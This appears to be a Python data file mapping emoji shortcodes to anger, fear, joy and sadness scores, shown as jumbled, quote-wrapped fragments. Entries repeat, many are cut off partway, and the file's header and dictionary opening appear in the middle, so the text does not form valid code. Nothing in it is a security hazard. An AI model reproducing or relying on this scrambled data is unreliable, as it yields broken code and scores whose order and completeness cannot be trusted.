\":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289],", "\":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193,", "0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21,", "0.308, 0.098, 0.11199999999999999], \":envelope_with_arrow:\": [0.251, 0.08800000000000001, 0.063, 0.19899999999999998], \":crying_cat_face:\": [0.257, 0.264, 0.24600000000000002, 0.344]", "[0.128, 0.107, 0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004,", "0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004], \":fountain:\": [0.10099999999999999, 0.22899999999999998, 0.276, 0.292], \":seat:\":", "0.18899999999999997, 0.214], \":kiss_mark:\": [0.272, 0.10800000000000001, 0.273, 0.16699999999999998], \":large_orange_diamond:\": 
[0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\":", "0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204], \":no_entry:\": [0.312,", "0.19], \":radio:\": [0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179,", "0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001],", "0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21], \":person_gesturing_NO:\": [0.28800000000000003, 0.28800000000000003, 0.11, 0.29600000000000004],", "0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213, 0.263, 0.171, 0.276], \":input_latin_lowercase:\": [0.193,", "[0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999,", "\":chicken:\": [0.16899999999999998, 0.192, 0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001,", "0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292,", "0.23399999999999999, 0.271], \":map_of_Japan:\": [0.122, 0.213, 0.24100000000000002, 0.152], \":boar:\": [0.187, 0.26899999999999996, 0.122, 0.158], \":boy:\":", "0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239,", "\":unlocked:\": [0.207, 0.20600000000000002, 0.17, 0.109], \":leaf_fluttering_in_wind:\": [0.231, 0.19399999999999998, 0.382, 0.139], \":closed_mailbox_with_lowered_flag:\": [0.184, 0.19,", "0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 
0.099], \":nine_o’clock:\": [0.15,", "0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\": [0.126, 0.18600000000000003, 0.214, 0.14300000000000002], \":castle:\": [0.069,", "0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19],", "0.171, 0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\":", "\":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172,", "0.16699999999999998], \":large_orange_diamond:\": [0.33, 0.21100000000000002, 0.223, 0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184,", "\":dizzy_face:\": [0.34700000000000003, 0.45799999999999996, 0.12300000000000001, 0.361], \":footprints:\": [0.21, 0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171,", "0.153], \":speak-no-evil_monkey:\": [0.214, 0.2, 0.081, 0.147], \":hot_springs:\": [0.21, 0.228, 0.128, 0.17300000000000001], \":tent:\": [0.105,", "0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268, 0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\":", "0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\": [0.281, 0.172, 0.14800000000000002, 0.212], \":ewe:\": [0.29,", "0.414, 0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\":", "0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\":", "\":ledger:\": [0.115, 0.17, 0.256, 0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289,", "[0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 
0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127,", "0.12, 0.292], \":dog_face:\": [0.13, 0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\":", "0.247, 0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165],", "0.131], \":Sagittarius:\": [0.17, 0.217, 0.21, 0.22], \":fuel_pump:\": [0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141,", "0.301], \":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415,", "0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999,", "0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\":", "0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183,", "0.156], \":yen_banknote:\": [0.217, 0.182, 0.171, 0.302], \":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126,", "0.233, 0.265, 0.284], \":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002],", "[0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276,", "\":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002, 0.284,", "0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 
0.302, 0.20199999999999999], \":old_man:\": [0.27,", "0.23399999999999999, 0.17800000000000002, 0.165], \":shaved_ice:\": [0.213, 0.168, 0.152, 0.096], \":video_game:\": [0.138, 0.20199999999999999, 0.145, 0.25],", "0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196, 0.299],", "0.354], \":bank:\": [0.23600000000000002, 0.284, 0.23800000000000002, 0.233], \":baby_angel:\": [0.20600000000000002, 0.19699999999999998, 0.414, 0.371], \":bar_chart:\": [0.213,", "0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299],", "0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205],", "0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257,", "0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996],", "0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\":", "0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003,", "\":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003,", "[0.14400000000000002, 0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001,", "0.16699999999999998], \":pot_of_food:\": [0.18, 
0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998,", "\":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\": [0.212, 0.188,", "0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083, 0.172], \":laptop_computer:\":", "\":part_alternation_mark:\": [0.203, 0.12300000000000001, 0.201, 0.305], \":magnifying_glass_tilted_right:\": [0.177, 0.253, 0.244, 0.12300000000000001], \":red_circle:\": [0.244, 0.22,", "0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\":", "0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292, 0.179, 0.20800000000000002], \":chocolate_bar:\": [0.147, 0.11699999999999999, 0.152, 0.10800000000000001], \":candy:\": [0.192,", "[0.228, 0.132, 0.262, 0.177], \":hibiscus:\": [0.085, 0.218, 0.316, 0.151], \":notebook_with_decorative_cover:\": [0.139, 0.15, 0.278,", "0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127,", "0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321,", "0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998,", "[0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355,", "0.126, 0.14, 0.213], \":confounded_face:\": [0.392, 0.531, 0.172, 0.433], 
\":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003],", "0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289], \":speaker_high_volume:\": [0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\":", "0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31], \":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139,", "0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25,", "0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075,", "0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192],", "0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299,", "0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221, 0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165,", "\":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\": [0.34, 0.493, 0.161, 0.27], \":green_heart:\": [0.126, 0.159,", "0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207], \":input_latin_uppercase:\":", "\":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998,", "0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251, 0.182, 0.195, 0.121],", "0.215, 0.122], \":sunset:\": [0.065, 0.19899999999999998, 0.28600000000000003, 0.201], 
\":carp_streamer:\": [0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\":", "[0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048,", "0.08800000000000001, 0.222], \":locked:\": [0.146, 0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\":", "[0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336,", "0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13, 0.245, 0.17600000000000002], \":skis:\":", "[0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168], \":front-facing_baby_chick:\": [0.135, 0.147, 0.152,", "0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259],", "[0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002, 0.215, 0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995,", "0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\": [0.165, 0.157, 0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997,", "0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\":", "[0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998,", "0.35200000000000004, 0.16699999999999998, 0.226], 
\":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002],", "\":eyes:\": [0.272, 0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249,", "0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998, 0.306, 0.225],", "[0.19, 0.23, 0.081, 0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087,", "0.149], \":chestnut:\": [0.212, 0.16699999999999998, 0.16899999999999998, 0.078], \":curry_rice:\": [0.161, 0.172, 0.175, 0.145], \":school_backpack:\": [0.127,", "\":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003,", "[0.215, 0.171, 0.159, 0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086,", "0.08900000000000001], \":dragon_face:\": [0.198, 0.298, 0.205, 0.157], \":END_arrow:\": [0.285, 0.32, 0.23199999999999998, 0.40299999999999997], \":beaming_face_with_smiling_eyes:\": [0.091,", "[0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207], \":mobile_phone_off:\": [0.17600000000000002, 0.247, 0.146,", "0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106], \":poodle:\": [0.18600000000000003, 0.21600000000000003, 0.168, 0.152], \":dress:\":", "[0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237,", "0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156,", "[0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": 
[0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078,", "\":cityscape_at_dusk:\": [0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306,", "0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184],", "\":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002,", "0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159, 0.222, 0.263], \":first_quarter_moon:\": [0.24100000000000002,", "[0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09, 0.179], \":person_pouting:\": [0.293, 0.244, 0.196,", "0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\":", "\":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259,", "\":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239,", "\":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003,", "0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\": [0.264, 0.376, 0.155, 0.303], \":red_apple:\": [0.251,", "[0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\": [0.10800000000000001, 0.21600000000000003, 0.355, 0.149], \":cookie:\": [0.11699999999999999, 0.18, 
0.168,", "0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086],", "0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\":", "[0.053, 0.24, 0.259, 0.23399999999999999], \":steaming_bowl:\": [0.183, 0.129, 0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002,", "[0.125, 0.212, 0.131, 0.095], \":smiling_face_with_smiling_eyes:\": [0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253,", "0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001], \":chequered_flag:\": [0.221,", "[0.271, 0.29, 0.16, 0.295], \":double_exclamation_mark:\": [0.157, 0.125, 0.063, 0.086], \":fast_up_button:\": [0.243, 0.23600000000000002, 0.251,", "0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188,", "\":church:\": [0.20800000000000002, 0.276, 0.773, 0.366], \":cyclone:\": [0.16899999999999998, 0.28800000000000003, 0.177, 0.214], \":black_large_square:\": [0.396, 0.159,", "\":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003,", "0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221, 0.20600000000000002], \":fish:\": [0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212,", "[0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46,", "0.152], \":dress:\": [0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 
0.226, 0.166], \":love_letter:\": [0.13,", "0.151, 0.12], \":dango:\": [0.27899999999999997, 0.193, 0.139, 0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\":", "0.36], \":chart_increasing_with_yen:\": [0.175, 0.248, 0.305, 0.20800000000000002], \":satellite_antenna:\": [0.204, 0.259, 0.303, 0.27], \":mobile_phone:\": [0.127,", "<gh_stars>1-10 # anger, fear, joy, sadness emoji_emotions = { \":person_surfing:\": [0.12, 0.195, 0.08800000000000001,", "0.149, 0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\":", "[0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332,", "0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152],", "[0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447], \":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158,", "0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138, 0.139], \":pager:\": [0.14400000000000002,", "0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\":", "[0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003,", "\":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\": [0.18100000000000002, 0.21100000000000002, 0.067, 0.134], \":growing_heart:\": [0.151, 0.067,", "\":Virgo:\": 
[0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214,", "0.376, 0.305, 0.184], \":zzz:\": [0.142, 0.213, 0.41100000000000003, 0.289], \":wrench:\": [0.25, 0.313, 0.337, 0.13699999999999998],", "0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155], \":squinting_face_with_tongue:\": [0.083, 0.14, 0.027000000000000003, 0.14300000000000002],", "0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168,", "0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204],", "[0.233, 0.147, 0.359, 0.134], \":six_o’clock:\": [0.14300000000000002, 0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138,", "[0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145], \":game_die:\": [0.126, 0.162, 0.09,", "\":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284, 0.385,", "0.184, 0.125, 0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998],", "[0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122, 0.151, 0.132], \":pouting_cat_face:\": [0.45399999999999996, 0.268, 0.11900000000000001,", "\":custard:\": [0.16399999999999998, 0.17600000000000002, 0.158, 0.131], \":cocktail_glass:\": [0.032, 0.14300000000000002, 0.146, 0.046], \":Japanese_dolls:\": [0.053, 0.14,", "[0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369], \":honey_pot:\": [0.177, 0.18100000000000002, 0.264,", 
"\":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258,", "0.17600000000000002], \":love_hotel:\": [0.040999999999999995, 0.141, 0.22899999999999998, 0.155], \":alien_monster:\": [0.128, 0.228, 0.087, 0.19699999999999998], \":file_folder:\": [0.151,", "[0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\": [0.13, 0.392, 0.07400000000000001,", "0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207], \":thumbs_up:\": [0.20199999999999999, 0.265, 0.264, 0.19399999999999998], \":woman:\": [0.24100000000000002,", "\":school_backpack:\": [0.127, 0.154, 0.174, 0.094], \":diamond_with_a_dot:\": [0.222, 0.179, 0.32, 0.249], \":antenna_bars:\": [0.16399999999999998, 0.122,", "0.263, 0.131, 0.154], \":white_flower:\": [0.187, 0.141, 0.19, 0.14400000000000002], \":weary_cat_face:\": [0.251, 0.27, 0.095, 0.242],", "[0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215,", "0.166, 0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\":", "0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\":", "[0.07400000000000001, 0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314,", "0.276, 0.235], \":TOP_arrow:\": [0.162, 0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\":", "\":ON!_arrow:\": [0.126, 0.139, 0.068, 0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16,", "[0.344, 0.204, 0.128, 0.11900000000000001], \":roller_coaster:\": 
